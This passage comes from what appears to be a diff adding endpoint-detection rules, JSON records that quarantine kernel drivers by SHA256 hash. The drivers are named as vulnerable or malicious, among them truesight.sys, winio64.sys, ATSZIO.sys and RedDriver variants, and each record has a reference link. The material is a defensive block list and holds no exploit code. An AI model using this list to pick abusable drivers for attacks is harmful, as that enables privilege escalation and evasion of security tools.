"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9c980820-ef5c-501f-a236-e148171aacd6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972721Z", + "creation_date": "2026-03-23T11:45:29.972723Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972728Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "04f771d72a812fe9dd6bced402b36b081c80bd3397fdd66dbaa44906ac088159", + "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9c9ea072-21ec-55e5-91ed-f144f03f80ea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819175Z", + "creation_date": "2026-03-23T11:45:30.819177Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819182Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "713c7a6532cbc952546c3b844ed529b5b285dc29e16036731ceebc6f6431ae77", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9ca1b18b-60a6-5db1-af13-b6c5168b4e9a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155649Z", + "creation_date": "2026-03-23T11:45:31.155651Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155657Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b31d89fa12755b4b91cadf4106aa617155a8ee6feac355ab40bf4fe54b4df3e1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9ca41e79-03b3-5654-9813-68078c4775a8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982361Z", + "creation_date": "2026-03-23T11:45:29.982363Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982368Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dbe9f17313e1164f06401234b875fbc7f71d41dc7271de643865af1358841fef", + "comment": "Vulnerable Kernel Driver (aka winio64.sys) [https://www.loldrivers.io/drivers/1ff757df-9a40-4f78-a28a-64830440abf7/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9cb60c53-cc25-5eb3-a624-d22b97780a5e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.458992Z", + "creation_date": "2026-03-23T11:45:30.458995Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459005Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0eace788e09c8d3f793a1fad94d35bcfd233f0777873412cd0c8172865562eec", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9cb8639e-04d2-52d1-a72a-3a4f69960fcb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616605Z", + "creation_date": "2026-03-23T11:45:29.616607Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616612Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e7cbfb16261de1c7f009431d374d90e9eb049ba78246e38bc4c8b9e06f324b6f", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9cc171a0-314f-53a6-9bb6-cdc71b7cb3d6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818772Z", + "creation_date": "2026-03-23T11:45:30.818774Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818779Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9fa699246d83356d7b4bd99adf3c74f8e0682a650de2687075e70418ee9d5e38", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) 
[https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9cd4d84b-7a24-5985-a128-13cc8ed06361", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142128Z", + "creation_date": "2026-03-23T11:45:31.142130Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142136Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e507406311a9ca0620cae70209d97725fb22fdfb4e94b941284fdf5c1e310ba6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9cd914a6-e239-5a25-b2bd-4631f88e0eab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145523Z", + 
"creation_date": "2026-03-23T11:45:31.145525Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145531Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f1c1a28aac308366f9679c2d730e6e93e9f1344c5961242f99f7129f29e50d9d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9ce8fc0c-8b80-557c-a4c7-312d4701a69e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612351Z", + "creation_date": "2026-03-23T11:45:29.612352Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612358Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0da746e49fd662be910d0e366934a7e02898714eaaa577e261ab40eb44222b5c", + "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"9ced9727-4ce2-5198-817f-4b520b5109d6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979047Z", + "creation_date": "2026-03-23T11:45:29.979049Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979054Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d8f7ddf5de213c6dc0356dc83b6307ec596e66c33c3cdd826a612c12004ba9dc", + "comment": "Vulnerable Kernel Driver (aka driver7-x64.sys) [https://www.loldrivers.io/drivers/48bc2815-85ec-4436-a51a-69810c8cb171/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9cefeb14-f96d-5260-8867-d1678c10fb61", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821637Z", + "creation_date": "2026-03-23T11:45:31.821639Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.821645Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0f147b1c5060d3e9305f3a09e03bab079bdc7a964d55e95010a66a7b41981d4d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9cf4752c-0123-58c1-b076-feed5de72170", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494354Z", + "creation_date": "2026-03-23T11:45:31.494358Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494366Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b2e3825b2dcdba02bdf30c50735b41accf42da061fb0cbc8da28dbe5dc66394d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9cf79c39-5497-54be-8cdd-b150df53f77d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984547Z", + "creation_date": "2026-03-23T11:45:29.984549Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984554Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4530235508b99dffe4e912cc9cac7bdc237e79f5a331f601c43ba909d7a3af4a", + "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d008f86-67a2-5015-a43a-906aa897f8c1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498808Z", + "creation_date": "2026-03-23T11:45:31.498812Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498822Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"85a384142482e7ae94a3f9b37cd1270391c70731cf3c166167cd763061ad837c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d192b50-4c4e-5273-96c9-65fbd3d1b74a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985867Z", + "creation_date": "2026-03-23T11:45:29.985882Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985887Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "30061ef383e18e74bb067fbca69544f1a7544e8dc017d4e7633d8379aff4c3c3", + "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d1be502-8b7a-5a1b-9e37-693541c97ca0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821049Z", + "creation_date": "2026-03-23T11:45:30.821052Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821063Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f93e0d776481c4ded177d5e4aebb27f30f0d47dcb4a1448aee8b66099ac686e1", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d1d9634-194e-5459-99a3-03cbe3e9b75d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816472Z", + "creation_date": "2026-03-23T11:45:30.816474Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816480Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0afba623a3ae2726112c6458c212bb48b210566851b7604ed3fbb880ffd3859f", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) 
[https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d20e6e4-2677-50c7-a41d-fec7be678133", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607071Z", + "creation_date": "2026-03-23T11:45:29.607073Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607081Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cddd341f267a6094f7bd7d1b56427ebc029ccb348e7f0714d9301c2c67fdd5df", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d29b928-3941-5375-894b-e2cb6018c08d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499485Z", + "creation_date": 
"2026-03-23T11:45:31.499488Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499496Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a031cd87ef68c07233810f837490d4ffba620cf8e4504f51bf82b4f86602a022", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d29e34d-1e83-5940-bd93-f9e644666667", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495285Z", + "creation_date": "2026-03-23T11:45:31.495288Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495296Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "147ac26b660ed4e681e0458e032aeda8c0f0b06abd11c707399a4f0edf063de7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "9d2a71e5-c7e3-5439-b6f3-51cb4b2aab37", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145791Z", + "creation_date": "2026-03-23T11:45:32.145793Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145799Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f06493341f9f16b9d25a3a5e07851dd04b63f36904a21ec1da30bfcb9157724c", + "comment": "Malicious Kernel Driver (aka driver_5d61e4ea.sys) [https://www.loldrivers.io/drivers/0215d6d6-e0c4-4a11-bd3a-40511f89d736/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d310a62-9d3d-5977-8cfb-458d3357d46c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452489Z", + "creation_date": "2026-03-23T11:45:30.452492Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.452500Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "da70fa44290f949e9b3e0fcfe0503de46e82e0472e8e3c360da3fd2bfa364eee", + "comment": "Malicious Kernel Driver (aka c94f405c5929cfcccc8ad00b42c95083.sys) [https://www.loldrivers.io/drivers/ddefecdd-9410-46d9-8957-e23aac1aba0c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d31e4f0-b12c-520e-b15c-ba748aeb764e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981183Z", + "creation_date": "2026-03-23T11:45:29.981185Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981190Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ba224af60a50cad10d0091c89134c72fc021da8d34a6f25c4827184dc6ca5c7", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9d32aa4f-8f6d-5ae0-a0b4-12105a18e2d6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": 
